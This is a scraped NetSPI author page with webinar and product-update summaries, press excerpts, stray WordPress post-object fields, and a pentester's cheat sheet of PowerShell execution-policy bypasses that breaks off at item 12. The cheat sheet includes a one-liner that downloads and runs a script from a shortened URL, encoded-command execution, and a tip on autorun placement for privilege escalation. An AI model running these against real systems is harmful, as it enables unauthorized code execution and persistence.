Scott Sutherland

Scott is Vice President of Research at NetSPI. In that role, he helps grow the execution team and services while researching and developing the testing tools, techniques, and methodologies used during engagements. Over the past sixteen years, Scott has had the opportunity to provide security services to small and large organizations (Fortune 5) across many industry verticals, but his focus has always been on identifying critical client needs and designing service delivery models to help meet them. Scott has also been an active participant in the information security community and has contributed multiple open-source tools, technical security blog posts, whitepapers, and presentations.

Below are links to some of his published material:

Presentations
https://www.slideshare.net/nullbind

Recent Open-Source Projects
https://github.com/NetSPI/PowerUpSQL
https://github.com/NetSPI/Powerhuntshares
https://github.com/NetSPI/Powerhunt
More by Scott Sutherland
The Adversary is Using Artificial Intelligence. Why Aren’t You? (webinar, November 2023)

In this livestream, we explore the challenges of ransomware readiness and how AI can be your knight in shining armor. NetSPI’s VP of Research, Scott Sutherland, takes us through a unique three-phased approach to combating ransomware:

  • Phase 1: Breach and Attack Simulation 
  • Phase 2: IR Tabletop 
  • Phase 3: Custom Runbooks 

Are you ready to equip yourself with the knowledge and tools to combat one of our most significant cybersecurity threats? 

Watch the recording: https://youtu.be/qX4ysXWJBno

BAS In Action: NetSPI’s Breach and Attack Simulation Demo (webinar, March 2023)

In this video, NetSPI Vice President of Research Scott Sutherland provides a deep-dive demo of NetSPI’s Breach and Attack Simulation (BAS) tool. See our centralized detective control validation platform in action and learn how it gives companies the ability to create and execute custom procedures using proven technology and expert human penetration testers.

Ready to continuously simulate real-world attack behaviors, not just IoCs, and put your detective controls to the test in a way no other organization can? See BAS in action or schedule a 1:1 meeting with the NetSPI BAS team to get started.

Table of Contents

00:00 Introduction 

Scott Sutherland explains market trends and gaps that led to the development of NetSPI’s Breach and Attack Simulation. 

02:09 Vocabulary 

Learn key concepts such as Procedure, Play, Playbook, Operation, and Agent, to set the stage for the rest of the video, ensuring that no matter your detective control experience, you understand the benefits and use cases of NetSPI’s Breach and Attack Simulation. 

05:17 The Landing Page 

Learn what it looks like when you first log in to NetSPI’s Breach and Attack Simulation platform. Clearly see summary information about your company’s detective control levels, what agents are active, what operations have recently been completed, and more.  

Scott explains the most used features on this screen: 

  • Download Profile or Download Agent – Designed to make it easy to get started by completing downloads with a single click through our SaaS offering. 
  • Create Operation – Allowing you to learn what you have executed and measure detection levels throughout your organization. 
  • View Results – Jump back into the operation you last ran to view findings and pick up where you left off. 

07:09 Play Execution 

Learn how to execute a play using NetSPI’s Breach and Attack Simulation. We make it simple by organizing plays and procedures by MITRE ATT&CK phase, showing you each individual procedure, technique, when it was last run, and associated visibility levels.  

Here, we also explain how to execute and automate plays within the platform. 

11:58 Workspace 

The Workspace is the main place where analysts and engineers will spend their time. Learn how NetSPI’s Breach and Attack Simulation is designed to enable and educate SOC teams by providing visibility levels, descriptions, business impact, verification instructions, detection improvement guidance, supporting resources, and more for each play within the MITRE ATT&CK framework.

The Activity Log feature centralizes project status, communications, and reporting between your teams. 

Tags provide SOC teams the answer to the question, “Why does this matter?” by showing the Threat Actor, Tools, and Malware that use this specific attack. 

Finally, data is organized within dynamic charts that update in real time, allowing your team to understand moment-in-time detection levels. These charts can also be exported for reporting purposes.

18:47 Timeline

Learn how the Timeline dashboard allows you to measure the effectiveness of detective controls over time and calculate return-on-investment over customizable time periods. Prove the value that investments, staffing, or process changes are delivering. 

21:23 Heatmap

Learn how NetSPI’s Breach and Attack Simulation platform maps detection coverage capabilities to each phase of the cyber kill chain for each tactic or technique within the MITRE ATT&CK framework.

24:28 Operations

Learn how to customize the scope, procedures, plays, playbooks and reporting within an operation. 

26:09 Create & Update

Learn how to create and edit operations for specific use cases, such as simulating specific threat behavior, running subsets or categories of procedures and plays, or targeting specific techniques or procedures that you or your organization are concerned about.

32:25 Playbooks

Learn how to create playbooks within NetSPI’s Breach and Attack Simulation platform.

Breach and Attack Simulation & Security Team Success (webinar, March 2023)

Many companies test to see if malicious actors can gain access to their environment or steal their valuable information; however, most security professionals don’t know if they would be able to detect adversaries once they are already inside. In fact, only 20% of common attack behaviors are caught by out-of-the-box EDR, MSSP, and SIEM solutions.

Enjoy a conversation between Scott Sutherland, NetSPI's Vice President of Research, and SANS Institute's John Pescatore on how Breach and Attack Simulation (BAS) is a critical piece of security team success at any organization.

You’ll gain valuable insights into:

  • Key BAS market trends.
  • Critical discoveries from years of testing.
  • Noteworthy feedback from security team leaders.

Finally, you will learn how these findings have impacted the development of NetSPI’s latest Breach and Attack Simulation updates, which launched earlier this year, empowering security professionals to efficiently evaluate their detective controls, educate their SOC teams, and execute on actionable intelligence!

Watch the recording: https://youtu.be/6Oy7FTX2WsQ

NetSPI Offensive Security Solutions Updates: Q1 2023 (blog post, February 2023)

NetSPI prides itself on maintaining a leadership position in the global offensive security space by listening to client feedback, analyzing industry trends, and investing in breakthrough technology developments.

Over the last few months, our development teams have been busy, and are excited to introduce a variety of new features and capabilities across our Breach and Attack Simulation, Attack Surface Management, and Penetration Testing as a Service (PTaaS) solutions to help organizations improve security posture, streamline remediation, and protect themselves from adversaries.

Of the releases across our solutions portfolio, Breach and Attack Simulation (BAS) received the most significant updates, so let's start there.

Breach and Attack Simulation (BAS) 

NetSPI BAS data shows that only 20% of common attack behaviors are detected by traditional EDR, SIEM, and MSSP solutions. Although most companies spend thousands, even millions, of dollars on detective controls, very few test to validate that those controls work and provide the value they claim.

NetSPI’s Breach and Attack Simulation is designed to evaluate detective control effectiveness and educate security operations teams around common TTPs across the cyber kill chain. After many invaluable feedback sessions with NetSPI clients and hours of market research, we are excited to unveil major updates to our Breach and Attack Simulation platform, dialing in on three core dashboards: the Workspace, Timeline, and Heat Map dashboards.

Workspace 

The Workspace is where red teams, purple teams, security engineers, and analysts will spend a majority of their time. Here, they can build, configure and run customized procedures to test their detective controls. Key features within the Workspace include:

  • Utilize preconfigured procedures – or customize your own – to put detective controls to the test 
  • Visualize security posture and identify gaps using detailed summary charts that update in real time. These can be saved and downloaded to easily share with SOC teams and executive leadership to highlight gaps and justify budget for new staff and technology. 
  • Learn about each detection phase (logged, detected, alerted, responded, and prevented) for common TTPs within the MITRE ATT&CK framework – down to the individual procedure level. 
  • The Activity Log feature allows security teams to ditch the spreadsheets, wiki pages, and notepads they currently use to track information around their detective control capabilities and centralize this information from a summary viewpoint down to the findings level, allowing streamlined communication and remediation. It will also automatically log play execution and visibility state changes. 
  • Tags allow security teams to see the number of malware and threat actors that use the specific technique, helping prioritize resources and remediation efforts. Tags can also be leveraged to generate custom playbooks that include procedures used by unique threat actors, allowing security teams to measure their resiliency to specific threats quickly and easily. 
  • Export test results in JSON or CSV, allowing the SOC team to plug information into existing business processes and products, or develop customized metrics. 

In summary, the Workspace is designed to educate and enable security teams to understand common attack procedures, how to detect them, and provide resources where they can learn more. 
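Because the export is plain data, custom metrics are easy to build downstream of the platform. As a minimal sketch (the record fields below are hypothetical illustrations, not NetSPI's actual export schema), a few lines of Python can summarize coverage by visibility level:

```python
import json
from collections import Counter

# Hypothetical JSON export: one record per executed procedure,
# carrying the best visibility state observed for it.
sample_export = json.loads("""
[
  {"procedure": "LSASS memory dump",    "visibility": "alerted"},
  {"procedure": "PowerShell execution", "visibility": "logged"},
  {"procedure": "SMB lateral movement", "visibility": "none"},
  {"procedure": "Process injection",    "visibility": "prevented"}
]
""")

def coverage_summary(records):
    """Count procedures per visibility level and compute the share
    of procedures that produced any visibility at all."""
    levels = Counter(r["visibility"] for r in records)
    visible = sum(n for level, n in levels.items() if level != "none")
    return dict(levels), visible / len(records)

levels, rate = coverage_summary(sample_export)
print(f"{rate:.0%} of procedures produced some visibility")
```

A real pipeline would read the platform's JSON or CSV export instead of the inlined sample, then feed the summary into existing reporting processes.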

Timeline 

While the Workspace shows a lot of great information, it focuses on a single point in time. The Timeline dashboard, however, allows you to measure detective controls over time.

This allows security teams to prove the value of investments in people, processes, or technology. The Timeline dashboard will also show where things have improved, stayed the same, or gotten worse at any stage of the MITRE ATT&CK kill chain.

While many competitive BAS offerings will show only what is being alerted on, a unique differentiator for NetSPI is the ability to filter results and show changes in what is logged, detected, alerted, responded to, and prevented. These changes can be shown as a percentage (e.g., logging improved 5 percent) or a count (e.g., logging improved within two different procedures). Similar to the Workspace, these charts can be downloaded and easily inserted into presentations, emails, or other reports as needed.
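The percentage-versus-count distinction can be sketched concretely. Assuming two hypothetical point-in-time snapshots that map procedure names to a logged/not-logged state, both styles of change report fall out of a small comparison:

```python
# Hypothetical snapshots: procedure name -> was the behavior logged?
january = {"proc-1": False, "proc-2": False, "proc-3": True, "proc-4": False}
march   = {"proc-1": True,  "proc-2": True,  "proc-3": True, "proc-4": False}

def logging_delta(before, after):
    """Return (count of newly logged procedures, change in overall logging rate)."""
    newly = [p for p in before if not before[p] and after[p]]
    rate_before = sum(before.values()) / len(before)
    rate_after = sum(after.values()) / len(after)
    return len(newly), rate_after - rate_before

count, pct = logging_delta(january, march)
print(f"Logging improved within {count} procedures ({pct:.0%} increase)")
```

The same comparison generalizes to the other visibility states (detected, alerted, responded to, prevented) by swapping in the relevant boolean per procedure.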

For additional information on how NetSPI defines logging, detection, alerting, response, and prevention, read How to Paint a Comprehensive Threat Detection Landscape.

Heat Map

Security teams often refer to the MITRE ATT&CK framework, which catalogs the phases, tactics, and techniques of common TTPs seen in the wild. We know that many teams prefer seeing results in this framework, and as such, we have built it into our Breach and Attack Simulation platform. BAS delivers a familiar way to interact with the data while still connecting to the Workspace created for detection engineers and other security team members.

As mentioned in the Timeline dashboard section, a key differentiator is that we show the different visibility levels (logged, detected, alerted, responded, and prevented) within the MITRE ATT&CK framework – with coverage shown for each phase of the cyber kill chain and even down to each specific technique.

Here, we also have the ability to dig in and show all of the procedures that are supported within each technique category. These are then cross-linked back to the Workspace, to streamline remediation and re-testing of specific coverage gaps.

This is a quick summary of a few new features and benefits included in our updated Breach and Attack Simulation solution. If you would like to learn more, we encourage you to read our release notes or contact us for a demo.

Attack Surface Management (ASM) 

Attack Surface Management continues to be a major focus and a growing technology within the cybersecurity industry. NetSPI’s most recent ASM updates focus on organizing, filtering, and expanding information that was previously included but is now even easier to locate and pull actionable information from.

Three key new feature highlights from last quarter include Vulnerability Triggers, Certificate Transparency Logs, and the Subdomain Facet within our domain explore page.

Vulnerability Triggers

First off, what is a vulnerability? Vulnerabilities are exploitable conditions of significant risk identified on your attack surface, found by combining assets and exposures. Although a specific asset or exposure might not be very impactful on its own, a combination of them chained into a series of steps can result in much greater risk.

With the recent introduction of Vulnerability Triggers, admins can now query assets and exposures for specific criteria based on preconfigured or customized searches, and alert on the ones that are most concerning to their company. Vulnerability Triggers can be customized to search for criteria related to domains, IPs, or ports.

Long story short, Vulnerability Triggers allow your company to search not only for common assets, exploits, and vulnerabilities, but also for key areas of concern specific to your executive team, industry, organization, or project.
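Conceptually, a trigger is a saved predicate evaluated against each asset or exposure as it is discovered. The sketch below illustrates that idea only; the record fields and trigger format are hypothetical, not NetSPI's implementation:

```python
# Hypothetical asset/exposure records from an attack surface scan.
assets = [
    {"domain": "dev.example.com", "ip": "203.0.113.10", "port": 3389},
    {"domain": "www.example.com", "ip": "203.0.113.11", "port": 443},
]

# Hypothetical trigger criteria keyed on domain, IP, or port.
triggers = [
    {"name": "Exposed RDP", "field": "port", "equals": 3389},
    {"name": "Dev host internet-facing", "field": "domain", "contains": "dev."},
]

def evaluate(asset, trigger):
    """Return True if the asset matches the trigger's criterion."""
    value = asset.get(trigger["field"])
    if "equals" in trigger:
        return value == trigger["equals"]
    if "contains" in trigger:
        return trigger["contains"] in str(value)
    return False

alerts = [(t["name"], a["domain"]) for a in assets for t in triggers if evaluate(a, t)]
print(alerts)  # both triggers fire on dev.example.com
```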

Certificate Transparency Logs & Subdomain Facet

The next two new features are focused on root domain and subdomain discovery.

NetSPI’s ASM has searched root domains and subdomains since its creation; however, we are proud to officially introduce Certificate Transparency Logs! We now ingest certificate transparency logs from public data sources, allowing us to significantly increase domain discovery.

We are also excited to announce the release of the Subdomain Facet within our domain explore page. It is common for companies to have tens, or even hundreds, of subdomains on their attack surface; with the Subdomain Facet, you can now filter the common subdomains on your attack surface.

A great use case is discovering development subdomains (dev.netspi.com, stage.netspi.com, prod.netspi.com, etc.) where sensitive projects or intellectual property might be located and unintentionally exposed externally.

Another common use case for these features is detecting subdomains that have been hijacked by malicious adversaries in an attempt to steal sensitive customer or employee information.
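Certificate transparency logs are publicly searchable (crt.sh is one well-known frontend), and each certificate's name list can be reduced to a deduplicated set of subdomains for a root domain. The sketch below parses a crt.sh-style JSON payload inlined as sample data; the exact response fields should be verified against the service before relying on them:

```python
import json

# Inlined sample shaped like a crt.sh JSON response, where
# "name_value" holds newline-separated DNS names per certificate.
sample = json.loads("""
[
  {"name_value": "dev.example.com\\nexample.com"},
  {"name_value": "stage.example.com"},
  {"name_value": "*.example.com\\ndev.example.com"}
]
""")

def subdomains(records, root="example.com"):
    """Collect unique subdomains of `root` from CT log records."""
    names = set()
    for record in records:
        for name in record["name_value"].splitlines():
            name = name.lstrip("*.")  # drop wildcard labels
            if name.endswith("." + root):
                names.add(name)
    return sorted(names)

print(subdomains(sample))  # ['dev.example.com', 'stage.example.com']
```

A real collector would fetch the JSON over HTTP and handle pagination and rate limits; the parsing and deduplication logic stays the same.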

This is a quick summary of a few new features and benefits included in our Attack Surface Management offering. If you would like to learn more, we encourage you to read our release notes or contact us for a demo.

Penetration Testing as a Service (Resolve™) 

NetSPI’s Resolve, our penetration testing as a service (PTaaS) platform, has been an industry leader for years, allowing users to visualize their test results and streamline remediation by up to 40%. The product would not remain a leader without continued updates from our product development teams.

Recently, we have focused on delivering updates that enhance the user experience and make data within the platform more accessible and more easily leveraged within other security team processes and platforms.

AND/OR Logic

Previously, when users created filters in the grid, either AND logic or OR logic could be applied to filtered search results. We are excited to introduce combined AND/OR logic for filters, allowing users to mix both and deliver more detailed results to their security teams or business leaders.

Automated Instance State Workflow

Finally, we have extended automated instance state workflows to support bulk edits. Previously, automation applied only when updating individual instance states. This change improves efficiency within the Resolve platform for entire vulnerability management teams.

This is a quick summary of a few new features and benefits included in our PTaaS solution. If you would like to learn more, we encourage you to read our release notes or contact us for a demo.

This blog post is a part of our offensive security solutions update series. Stay tuned for additional innovations within Resolve (PTaaS), ASM (Attack Surface Management), and BAS (Breach and Attack Simulation).



SecurityWeek: Cyber Insights 2023: Cyberinsurance (blog post, January 2023)

On January 31, NetSPI’s Scott Sutherland, VP of Research, and Norman Kromberg, CISO, were featured in the SecurityWeek article Cyber Insights 2023: Cyberinsurance. Read the preview below or view it online.

+++

SecurityWeek Cyber Insights 2023 | Cyberinsurance – Cyberinsurance emerged into the mainstream in 2020. In 2021 it found its sums were wrong over ransomware and it had to increase premiums dramatically. In 2022, Russia invaded Ukraine with the potential for more serious and more costly global nation-state cyberattacks – and Lloyd’s of London announced a stronger and clearer war exclusions clause.

Higher premiums and wider exclusions are the primary methods for insurance to balance its books – and it is already having to use both. The question for 2023 and beyond is whether the cyberinsurance industry can make a profit without destroying its market. But one thing is certain: a mainstream, funds-rich business like insurance will not easily relinquish a market from which it can profit.

It has a third tool, which has not yet been fully unleashed: prerequisites for cover.

The Lloyd’s war exclusion clause and other difficulties

The Lloyd’s exclusion clause dates to the NotPetya incident of 2017. In some cases, insurers refused to pay out on related claims. Josephine Wolff, an associate professor of cybersecurity policy at The Fletcher School, Tufts University, has written a history of cyberinsurance titled Cyberinsurance Policy: Rethinking Risk in an Age of Ransomware, Computer Fraud, Data Breaches, and Cyberattacks.

“Merck and Mondelez sued their insurers for denying claims related to the attack on the grounds that it was excluded from coverage as a hostile or warlike action because it was perpetrated by a national government,” she explains. However, an initial ruling in late 2021, unsealed in January 2022, indicated that if insurers wanted to exclude state-sponsored attacks from their coverage they must write exclusions stating that explicitly, rather than relying on boilerplate war exclusions. Merck was granted summary judgment on its claim for $1.4 billion.

The Russia/Ukraine kinetic war has caused a massively increased expectation of nation state-inspired cyberattacks against Europe, the US, NATO, and other west-leaning nations. Lloyd’s rapidly responded with an expanded, but cyberinsurance-centric, war exclusion clause excluding state-sponsored cyberattacks that will kick in from March 2023.

Insurers’ response

2023 is a watershed moment for cyberinsurance. It will not abandon what promises to be a massive market – but clearly it cannot continue with its makeshift approach of simply increasing both premiums and exclusions to balance the books indefinitely.

Nevertheless, the expansion of ‘prerequisites’ would be a major – and probably inevitable – evolution in the development of cyberinsurance. Cyberinsurance began as a relatively simple gap-filler. The industry recognized that standard business insurance didn’t explicitly cover against cyber risks, and cyberinsurance evolved to fill that gap. In the beginning, there was no intention to impose cybersecurity conditions on the insured, beyond perhaps a few non-specific basics such as having MFA installed.

But now, comments Scott Sutherland, VP of Research at NetSPI, “Insurance company security testing standards will evolve.” It’s been done before, and PCI DSS is the classic example. The payment card industry, explains Sutherland, “observed the personal/business risk associated with insufficient security controls and the key stakeholders combined forces to build policies, standards, and testing procedures that could help reduce that risk in a manageable way for their respective industries.”

He continued, “My guess and hope for 2023 is that the major cyber insurance companies start talking about developing a unified standard for qualifying for cyber insurance. Hopefully, that will bring more qualified security testers into that market, which can help drive down the price of assessments and reduce the guesswork/risk being taken on by the cyber insurance companies. While there are undoubtedly more cyber insurance companies than card brands, I think it would work in the best interest of the major players to start serious discussions around the issue and potential solutions.”

There is no silver bullet for cybersecurity. Breaches will continue and will continue to rise in cost and severity – and the insurance industry will continue to balance its books through increasing premiums, exclusions, and insurance refusals. The best that can be hoped for from insurers increasing security requirements is that, as Norman Kromberg, CISO at NetSPI suggests, “Cyber Insurance will become a leading driver for investment in security and IT controls.”

You can read the full article at Security Week!

[post_title] => SecurityWeek: Cyber Insights 2023: Cyberinsurance [post_excerpt] => NetSPI Scott Sutherland, VP of Research, and Norman Kromberg, CISO, were featured in the SecurityWeek article called Cyber Insights 2023: Cyberinsurance. [post_status] => publish [comment_status] => closed [ping_status] => closed [post_password] => [post_name] => securityweek-cyber-insights-2023-cyberinsurance [to_ping] => [pinged] => [post_modified] => 2023-02-07 16:12:38 [post_modified_gmt] => 2023-02-07 22:12:38 [post_content_filtered] => [post_parent] => 0 [guid] => https://www.netspi.com/?p=29342 [menu_order] => 144 [post_type] => post [post_mime_type] => [comment_count] => 0 [filter] => raw ) [5] => WP_Post Object ( [ID] => 29189 [post_author] => 17 [post_date] => 2023-01-11 09:00:00 [post_date_gmt] => 2023-01-11 15:00:00 [post_content] =>

On January 11, NetSPI VP of Research Scott Sutherland was featured in the Help Net Security article called 4 Key Shifts in the Breach and Attack Simulation (BAS) Market. Read the preview below or view it online.

+++

The increase in the number of attack surfaces along with the rise in cybercriminal sophistication is generating technical debt for security operations centers (SOCs), many of which are understaffed and unable to dedicate time to effectively manage the growing number of security tools in their environment.

Yet, regardless of these challenges, SOC teams are tasked to continuously evolve and adapt to defend against emerging, sophisticated threats.

There are several major players in the BAS market that promise continuous automated security control validation. Many can replicate specific attacker behavior and integrate with your telemetry stack to verify that the behavior was observed, generated an alert, and was blocked.

But as the BAS market continues to evolve, there’s also an opportunity to address shortcomings. In the new year, we expect to see several incremental improvements to BAS solutions, with these four themes leading the charge.

More Streamlined Product Deployment to Reduce Costs

Many fully automated security control validation solutions include hidden costs. First, they require up-front configuration for their on-site deployments, which may also require customizations to ensure everything works properly with the integrations. Additionally, BAS solutions need to be proactively maintained, and for enterprise environments this often requires dedicated staff.

As a result, we’ll see BAS vendors work harder to streamline their product deployments to help reduce the overhead cost for their customers through methods such as providing more SaaS-based offerings.

You can read the full article at Help Net Security!

[post_title] => Help Net Security: 4 Key Shifts in the Breach and Attack Simulation (BAS) Market [post_excerpt] => On January 11, NetSPI VP of Research Scott Sutherland was featured in the Help Net Security article called 4 Key Shifts in the Breach and Attack Simulation (BAS) Market. [post_status] => publish [comment_status] => closed [ping_status] => closed [post_password] => [post_name] => 4-key-shifts-in-the-breach-and-attack-simulation-bas-market [to_ping] => [pinged] => [post_modified] => 2023-01-23 15:09:55 [post_modified_gmt] => 2023-01-23 21:09:55 [post_content_filtered] => [post_parent] => 0 [guid] => https://www.netspi.com/?p=29189 [menu_order] => 153 [post_type] => post [post_mime_type] => [comment_count] => 0 [filter] => raw ) [6] => WP_Post Object ( [ID] => 29117 [post_author] => 17 [post_date] => 2022-12-29 09:00:00 [post_date_gmt] => 2022-12-29 15:00:00 [post_content] =>

On December 29, NetSPI's Scott Sutherland and Nick Landers were featured in the Enterprise Security Tech article called 2023 Cybersecurity Predictions: Major Financial Institutions Will Turn To Blockchain. Read the preview below or view it online.

+++

Scott Sutherland, VP of Research, NetSPI

Can DLT Help Stop Software Supply Chain Attacks?

Adoption of distributed ledger technology (DLT) is still in its infancy and we’ll see some interesting use cases gain momentum in 2023. DLT can basically be used as a database that enforces security through cryptographic keys and signatures. Since the stored data is immutable, DLT can be used anytime you need a high-integrity source of truth. That comes in handy when trying to ensure the security of open-source projects (and maybe some commercial ones). Over the last few years, there have been several “supply chain compromises” that boil down to an unauthorized code submission. In response to those attacks, many software providers have started to bake more security reviews and audit controls into their SDLC process. Additionally, the companies consuming software have beefed up their requirements for adopting/deploying third-party software in their environment. However, neither really solves the core issue, which is that anyone with administrative access to the systems hosting the code repository can bypass the intended controls. DLT could be a solution to that problem.

Nick Landers, VP of Research, NetSPI

By the end of next year every major financial institution will have announced adoption of Blockchain technology.

There is a notable trend of Blockchain adoption in large financial institutions. The primary focus is custodial offerings of digital assets, and private chains to maintain and execute trading contracts. The business use cases for Blockchain technology will deviate starkly from popularized tokens and NFTs. Instead, industries will prioritize private chains to accelerate business logic, digital asset ownership on behalf of customers, and institutional investment in Proof of Stake chains.

By the end of next year, I would expect every major financial institution will have announced adoption of Blockchain technology, if they haven’t already. Nuanced technologies like Hyperledger Fabric have received much less security research than Ethereum, EVM, and Solidity-based smart contracts. Additionally, the supported features in business-focused private chain technologies differ significantly from their public counterparts. This ultimately means more attack surface, more potential configuration mistakes, and more required training for development teams. If you thought that blockchain was “secure by default”, think again. Just like cloud platform adoption, the promises of “secure by default” will fall away as unique attack paths and vulnerabilities are discovered in the nuances of this tech.

You can read the full article at Enterprise Security Tech!

[post_title] => Enterprise Security Tech: 2023 Cybersecurity Predictions: Major Financial Institutions Will Turn To Blockchain [post_excerpt] => NetSPI's Scott Sutherland and Nick Landers were featured in the Enterprise Security Tech article called 2023 Cybersecurity Predictions: Major Financial Institutions Will Turn To Blockchain. [post_status] => publish [comment_status] => closed [ping_status] => closed [post_password] => [post_name] => enterprise-security-tech-2023-cybersecurity-predictions [to_ping] => [pinged] => [post_modified] => 2023-01-23 15:09:57 [post_modified_gmt] => 2023-01-23 21:09:57 [post_content_filtered] => [post_parent] => 0 [guid] => https://www.netspi.com/?p=29117 [menu_order] => 159 [post_type] => post [post_mime_type] => [comment_count] => 0 [filter] => raw ) [7] => WP_Post Object ( [ID] => 1107 [post_author] => 17 [post_date] => 2022-12-16 13:21:46 [post_date_gmt] => 2022-12-16 19:21:46 [post_content] =>

By default, PowerShell is configured to prevent the execution of PowerShell scripts on Windows systems. This can be a hurdle for penetration testers, sysadmins, and developers, but it doesn't have to be. In this blog, I'll cover 15 ways to bypass the PowerShell execution policy without having local administrator rights on the system. I'm sure there are many techniques I've missed (or simply don't know about), but hopefully this cheat sheet will offer a good start for those who need it.

What is the PowerShell Execution Policy?

The PowerShell execution policy is the setting that determines which types of PowerShell scripts (if any) can be run on the system. By default, it is set to "Restricted", which basically means none. However, it's important to understand that the setting was never meant to be a security control. Instead, it was intended to prevent administrators from shooting themselves in the foot. That's why there are so many options for working around it, including a few that Microsoft has provided. For more information on the execution policy settings and other default security controls in PowerShell, I suggest reading Carlos Perez's blog, which provides a nice overview.

Why Would I Want to Bypass the Execution Policy?

Automation seems to be one of the more common responses I hear from people, but below are a few other reasons PowerShell has become so popular with administrators, pentesters, and hackers. PowerShell is:

  • Native to Windows
  • Able to call the Windows API
  • Able to run commands without writing to the disk
  • Able to avoid detection by anti-virus software
  • Already flagged as "trusted" by most application whitelisting solutions
  • The medium used to write many open-source pentest toolkits

How to View the Execution Policy

Before being able to use all of the wonderful features PowerShell has to offer, attackers may have to bypass the "Restricted" execution policy. You can take a look at the current configuration with the "Get-ExecutionPolicy" PowerShell command. If you're looking at the setting for the first time, it's likely set to "Restricted", as shown below.

PS C:\> Get-ExecutionPolicy
Restricted

It's also worth noting that the execution policy can be set at different levels on the system. To view a list of them use the command below. For more information you can check out Microsoft's "Set-ExecutionPolicy" page here.

Get-ExecutionPolicy -List | Format-Table -AutoSize

Lab Setup Notes

In the examples below I will use a script named runme.ps1 that contains the following PowerShell command to write a message to the console:

Write-Host "My voice is my passport, verify me."

When I attempt to execute it on a system configured with the default execution policy, I get an error stating that the script cannot be loaded because running scripts is disabled on the system.

If your current policy is too open and you want to make it more restrictive to test the techniques below, then run the command "Set-ExecutionPolicy Restricted" from an administrator PowerShell console. Ok - enough of my babbling - below are 15 ways to bypass the PowerShell execution policy restrictions.

Bypassing the PowerShell Execution Policy

1. Paste the Script into an Interactive PowerShell Console

Copy and paste your PowerShell script into an interactive console as shown below. However, keep in mind that you will be limited by your current user's privileges. This is the most basic example and can be handy for running quick scripts when you have an interactive console. Also, this technique does not result in a configuration change or require writing to disk.


2. Echo the Script and Pipe it to PowerShell Standard In

Simply ECHO your script into PowerShell standard input. This technique does not result in a configuration change or require writing to disk.

Echo Write-Host "My voice is my passport, verify me." | PowerShell.exe -noprofile -

3. Read Script from a File and Pipe to PowerShell Standard In

Use the Windows "type" command or PowerShell "Get-Content" command to read your script from the disk and pipe it into PowerShell standard input. This technique does not result in a configuration change, but does require writing your script to disk. However, you could read it from a network share if you're trying to avoid writing to the disk.

Example 1: Get-Content PowerShell command

Get-Content .\runme.ps1 | PowerShell.exe -noprofile -


Example 2: Type command

TYPE .\runme.ps1 | PowerShell.exe -noprofile -
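As mentioned above, the script can also be read from a network share instead of the local disk to avoid writing to it. A minimal sketch, assuming a hypothetical UNC path (\\server\share):

```powershell
# Hypothetical example: read the script from a network share so nothing is
# written to the local disk, then pipe it into PowerShell standard input.
Get-Content \\server\share\runme.ps1 | PowerShell.exe -noprofile -
```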

4. Download Script from URL and Execute with Invoke Expression

This technique can be used to download a PowerShell script from the internet and execute it without having to write to disk. It also doesn't result in any configuration changes. I have seen it used in many creative ways, but most recently saw it being referenced in a nice PowerSploit blog by Matt Graeber.

powershell -nop -c "iex(New-Object Net.WebClient).DownloadString('https://bit.ly/1kEgbuH')"

5. Use the Command Switch

This technique is very similar to executing a script via copy and paste, but it can be done without the interactive console. It's nice for simple script execution, but more complex scripts usually end up with parsing errors. This technique does not result in a configuration change or require writing to disk.

Example 1: Full command

Powershell -command "Write-Host 'My voice is my passport, verify me.'"


Example 2: Short command

Powershell -c "Write-Host 'My voice is my passport, verify me.'"

It may also be worth noting that you can put these types of PowerShell commands into batch files and drop them into autorun locations (like the all-users startup folder) to help during privilege escalation.

6. Use the EncodeCommand Switch

This is very similar to the "Command" switch, but all scripts are provided as a Unicode/base64 encoded string. Encoding your script in this way helps to avoid all those nasty parsing errors that you run into when using the "Command" switch. This technique does not result in a configuration change or require writing to disk. The sample below was taken from Posh-SecMod. The same toolkit includes a nice little compression method for reducing the size of the encoded commands if they start getting too long.

Example 1: Full command

$command = "Write-Host 'My voice is my passport, verify me.'" 
$bytes = [System.Text.Encoding]::Unicode.GetBytes($command) 
$encodedCommand = [Convert]::ToBase64String($bytes) 
powershell.exe -EncodedCommand $encodedCommand

Example 2: Short command using encoded string

powershell.exe -Enc VwByAGkAdABlAC0ASABvAHMAdAAgACcATQB5ACAAdgBvAGkAYwBlACAAaQBzACAAbQB5ACAAcABhAHMAcwBwAG8AcgB0ACwAIAB2AGUAcgBpAGYAeQAgAG0AZQAuACcA

7. Use the Invoke-Command Command

This is a fun option that I came across on the Obscuresec blog. It’s typically executed through an interactive PowerShell console or one liner using the “Command” switch, but the cool thing is that it can be used to execute commands against remote systems where PowerShell remoting has been enabled. This technique does not result in a configuration change or require writing to disk.

invoke-command -scriptblock {Write-Host "My voice is my passport, verify me."}

Based on the Obscuresec blog, the command below can also be used to grab the execution policy from a remote computer and apply it to the local computer.

invoke-command -computername Server01 -scriptblock {get-executionpolicy} | set-executionpolicy -force

8. Use the Invoke-Expression Command

This is another one that's typically executed through an interactive PowerShell console or one-liner using the "Command" switch. This technique does not result in a configuration change or require writing to disk. Below are a few common ways to use Invoke-Expression to bypass the execution policy.

Example 1: Full command using Get-Content

Get-Content .\runme.ps1 | Invoke-Expression

Example 2: Short command using Get-Content

GC .\runme.ps1 | iex

9. Use the "Bypass" Execution Policy Flag

This is a nice flag added by Microsoft that will bypass the execution policy when you're executing scripts from a file. When this flag is used Microsoft states that "Nothing is blocked and there are no warnings or prompts". This technique does not result in a configuration change or require writing to disk.

PowerShell.exe -ExecutionPolicy Bypass -File .\runme.ps1

10. Use the "Unrestricted" Execution Policy Flag

This is similar to the "Bypass" flag. However, when this flag is used Microsoft states that it "Loads all configuration files and runs all scripts. If you run an unsigned script that was downloaded from the Internet, you are prompted for permission before it runs." This technique does not result in a configuration change or require writing to disk.

PowerShell.exe -ExecutionPolicy Unrestricted -File .\runme.ps1

11. Use the "Remote-Signed" Execution Policy Flag

Create your script, then follow the tutorial written by Carlos Perez to sign it. Finally, run it using the command below:

PowerShell.exe -ExecutionPolicy RemoteSigned -File .\runme.ps1

12. Disable ExecutionPolicy by Swapping out the AuthorizationManager

This is one of the more creative approaches. The function below can be executed via an interactive PowerShell console or by using the "command" switch. Once the function is called, it will swap out the "AuthorizationManager", effectively disabling execution policy checks. This technique does not result in a persistent configuration change or require writing to disk; however, the change will remain in effect for the duration of the session.

